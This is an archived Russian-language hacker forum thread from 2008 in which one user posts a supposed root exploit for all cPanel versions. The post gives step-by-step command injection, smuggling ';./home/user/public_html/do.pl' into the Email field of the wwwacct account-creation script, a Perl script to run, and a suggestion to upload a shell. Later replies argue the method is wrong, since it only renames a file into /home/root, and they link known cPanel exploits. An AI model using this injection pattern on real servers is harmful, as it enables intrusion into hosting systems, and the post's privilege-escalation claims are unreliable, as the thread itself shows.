PDA

Просмотр полной версии : Cpanel all versions.


КВР
19.06.2008, 20:11
Cpanel



Версия: все

риск: очень высокий

Этот баг может привести к поднятию привелегий до рута

Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт

официальный сайт: Cpanel.net

[code]

Как это работает?

Что происходит когда ты создаёш аккаунт ?

./script/wwwact [domainname] [username] [password] [Email address] lab lab lab

Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086)

К примеру:

http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab

iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t)

так ты можеш выполнять любые команды, к примеру

./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)


()()()()()()()()()()()()()

Проверим:

++++++++++++++++++++++++++

Шаг первый

сохроните в фаил /home/user/public_html/do.pl .

#!/usr/bin/perl

$old='/home/user/public_html/test.txt';

$new='/home/root/kon.txt';

rename $old, $new;

++++++++++++++++++++++++++

Шаг второй

пазовите фаил test.txt в твоей public_html директории.

path will be : /home/user/public_html/test.txt .

++++++++++++++++++++++++++

Шаг третий

создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box

и нажмите нопку создать.

Теперь ты сможеш видеть /home/root/ .

++++++++++++++++++++++++++

()()()()()()()()()()()()()

Ты можеш выполнить и ваш собственный код !Залить шелл и тп.

gisTy
04.07.2008, 19:01
эээ... ты просто переименовал каталог... а рутовый каталог вообще то находится по адресу /root
а "багу" ты сам нашел? или взял откуда то? потому что то что ты тут описал тебе абсолютно не даст...

otmorozok428
05.07.2008, 16:39
Сам понял, чего написал-то? :eek: Я знаю две local root уязвимости для CPanel:

http://www.milw0rm.com/exploits/2466

http://www.milw0rm.com/exploits/2554

Но это по-ходу не они...

КВР, ответь на вопрос: у тебя самого это где-нибудь работало? :confused:

gisTy
05.07.2008, 17:02
ты посмотри что он делает.. он переименовывает каталог из /home/user в /home/root.. это ему ничего не даст так как рутовый каталог лежит по адресу /root а не /home/root.. поэтому все что тут описано на мой взгляд является полнейшим бредом